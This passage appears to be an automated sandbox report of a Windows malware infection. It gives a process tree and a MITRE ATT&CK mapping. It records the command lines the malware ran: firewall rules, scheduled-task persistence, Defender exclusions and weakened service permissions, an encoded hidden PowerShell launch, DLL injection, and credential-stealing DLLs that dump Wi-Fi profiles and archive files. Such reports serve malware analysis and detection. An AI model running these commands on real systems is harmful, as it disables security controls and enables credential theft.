      - C:\Users\Admin\AppData\Local\Senior Flash Decompiler\seniorflashdecompiler.exe
        
        "C:\Users\Admin\AppData\Local\Senior Flash Decompiler\seniorflashdecompiler.exe" -i
        6⤵
        Executes dropped EXE
        
        PID:1556
      - C:\Users\Admin\AppData\Local\Senior Flash Decompiler\seniorflashdecompiler.exe
        
        "C:\Users\Admin\AppData\Local\Senior Flash Decompiler\seniorflashdecompiler.exe" -s
        6⤵
        Executes dropped EXE
        
        PID:3976
  - - C:\Users\Admin\Pictures\RDOdP6RHoxxbbJZvBW0nzcZC.exe
      "C:\Users\Admin\Pictures\RDOdP6RHoxxbbJZvBW0nzcZC.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:1844
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:652
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 544
        6⤵
        Program crash
        
        PID:5068
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 540
        6⤵
        Program crash
        
        PID:4500
  - - C:\Users\Admin\Pictures\9YnX9TIPmfCMcUr7DOBqr4ym.exe
      "C:\Users\Admin\Pictures\9YnX9TIPmfCMcUr7DOBqr4ym.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1936
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:132
    - - C:\Users\Admin\Pictures\9YnX9TIPmfCMcUr7DOBqr4ym.exe
        
        "C:\Users\Admin\Pictures\9YnX9TIPmfCMcUr7DOBqr4ym.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        
        PID:3880
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:780
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4792
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:4708
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:2360
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2780
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:5720
  - - C:\Users\Admin\Pictures\YqnYErQDqyvWk0WfwDMsdpx4.exe
      "C:\Users\Admin\Pictures\YqnYErQDqyvWk0WfwDMsdpx4.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3356
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4876
    - - C:\Users\Admin\Pictures\YqnYErQDqyvWk0WfwDMsdpx4.exe
        
        "C:\Users\Admin\Pictures\YqnYErQDqyvWk0WfwDMsdpx4.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        
        PID:2800
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4820
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:404
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:1504
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:4152
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:5280
      - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5560
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:1092
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:1548
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        7⤵
        
        PID:5852
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:5820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:5720
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        7⤵
        Executes dropped EXE
        
        PID:5312
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:3700
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        7⤵
        
        PID:5272
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        
        PID:5984
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        9⤵
        Launches sc.exe
        
        PID:5164
  - - C:\Users\Admin\Pictures\CT7SLFhM3W2nqplaBtJ10Bf4.exe
      "C:\Users\Admin\Pictures\CT7SLFhM3W2nqplaBtJ10Bf4.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4792
    - - C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
        
        C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
        5⤵
        Executes dropped EXE
        
        PID:3584
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 1356
        6⤵
        Program crash
        
        PID:2780
    - - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
        
        C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2688
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
        6⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        7⤵
        Creates scheduled task(s)
        
        PID:4276
  - - C:\Users\Admin\Pictures\MWqP5e651UE727D9aFjdApYi.exe
      "C:\Users\Admin\Pictures\MWqP5e651UE727D9aFjdApYi.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:3272
  - - C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe
      "C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe" --silent --allusers=0
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Enumerates connected drives
      Modifies system certificate store
      PID:4224
    - - C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe
        
        C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.29 --initial-client-data=0x300,0x304,0x308,0x2dc,0x30c,0x6e9721f8,0x6e972204,0x6e972210
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1544
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\BOWXpT9EMatm7T8qv30PJ1Fe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\BOWXpT9EMatm7T8qv30PJ1Fe.exe" --version
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4756
    - - C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe
        
        "C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4224 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240321125130" --session-guid=5044f51c-e85e-4ba6-877a-92a02c40085f --server-tracking-blob=ZDg4NjQzYWExMDdmNjk0OTRmM2YzZjdiZDc3NWZhYzQ5Njg1MThmZjE4ODY3ZmQzMThkYzc0OTdlZWFmZTRkOTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMTAyNTQ3NC4yOTI3IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJlY2FlZjA0MC1lMGRjLTQ2ZjctOWY4ZS00NGE5OWUwMTcwMjkifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=3805000000000000
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        
        PID:3124
      - C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe
        
        C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.29 --initial-client-data=0x310,0x314,0x318,0x2e0,0x31c,0x6d9221f8,0x6d922204,0x6d922210
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1836
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403211251301\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403211251301\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
        5⤵
        Executes dropped EXE
        
        PID:3280
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403211251301\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403211251301\assistant\assistant_installer.exe" --version
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:6076
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403211251301\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403211251301\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x830040,0x83004c,0x830058
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5932
  - - C:\Users\Admin\Pictures\9Z26EcBsLLBcqwnDFb4WtGQK.exe
      "C:\Users\Admin\Pictures\9Z26EcBsLLBcqwnDFb4WtGQK.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3168
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2768
    - - C:\Users\Admin\Pictures\9Z26EcBsLLBcqwnDFb4WtGQK.exe
        
        "C:\Users\Admin\Pictures\9Z26EcBsLLBcqwnDFb4WtGQK.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        
        PID:6024
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:5296
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:5980
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:3624
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:4540
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:2556
  - - C:\Users\Admin\Pictures\BLHU0RlzPVoO4o5n4SRKk03P.exe
      "C:\Users\Admin\Pictures\BLHU0RlzPVoO4o5n4SRKk03P.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4952
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:404
    - - C:\Users\Admin\Pictures\BLHU0RlzPVoO4o5n4SRKk03P.exe
        
        "C:\Users\Admin\Pictures\BLHU0RlzPVoO4o5n4SRKk03P.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        
        PID:5936
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:1260
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:5140
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:5956
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:2808
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:6124
  - - C:\Users\Admin\Pictures\VEfRE0FVJNYHI28gmqs3eJxU.exe
      "C:\Users\Admin\Pictures\VEfRE0FVJNYHI28gmqs3eJxU.exe"
      4⤵
      Executes dropped EXE
      PID:2632
    - - C:\Users\Admin\AppData\Local\Temp\7zS58F8.tmp\Install.exe
        
        .\Install.exe
        5⤵
        Executes dropped EXE
        
        PID:1136
      - C:\Users\Admin\AppData\Local\Temp\7zS5B89.tmp\Install.exe
        
        .\Install.exe /igvdidk "385118" /S
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Drops file in System32 directory
        Enumerates system info in registry
        
        PID:4964
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:5436
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        9⤵
        
        PID:5528
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        9⤵
        
        PID:5640
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:5260
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:5412
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        9⤵
        
        PID:5580
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        9⤵
        
        PID:5664
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gBggYHUYG" /SC once /ST 07:06:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:6076
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gBggYHUYG"
        7⤵
        
        PID:5196
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gBggYHUYG"
        7⤵
        
        PID:5428
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bNoYxGgNiGReyhFIfY" /SC once /ST 12:53:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ\MfJxEgkARsuSvOa\PwJHubF.exe\" Qp /VLsite_idMfq 385118 /S" /V1 /F
        7⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:5536
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5528
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
  2⤵
  - Loads dropped DLL
  PID:4048
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:4332
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      PID:3368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\594324687199_Desktop.zip' -CompressionLevel Optimal
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1016
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:4032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 652 -ip 652
1⤵
PID:4704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 652 -ip 652
1⤵
PID:3676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3648 -ip 3648
1⤵
PID:2400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:880
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5680

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2736 -ip 2736
1⤵
PID:4916

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:2996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3584 -ip 3584
1⤵
PID:5284

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery

Virtualization/Sandbox Evasion